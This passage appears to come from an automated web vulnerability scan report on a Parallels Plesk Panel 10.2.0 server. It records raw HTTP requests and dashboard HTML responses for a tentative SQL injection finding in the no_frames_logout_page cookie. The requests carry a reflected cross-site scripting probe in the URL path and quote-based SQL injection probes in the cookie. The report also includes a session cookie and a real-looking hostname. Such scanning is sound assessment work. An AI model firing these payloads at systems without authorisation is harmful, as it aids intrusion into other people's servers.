<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E?1''=1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:37:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:37:03 GMT
Connection: close
Content-Length: 15992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [no_frames_logout_page cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The no_frames_logout_page cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the no_frames_logout_page cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted'; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:02 GMT
Connection: close
Content-Length: 16502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted''; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; 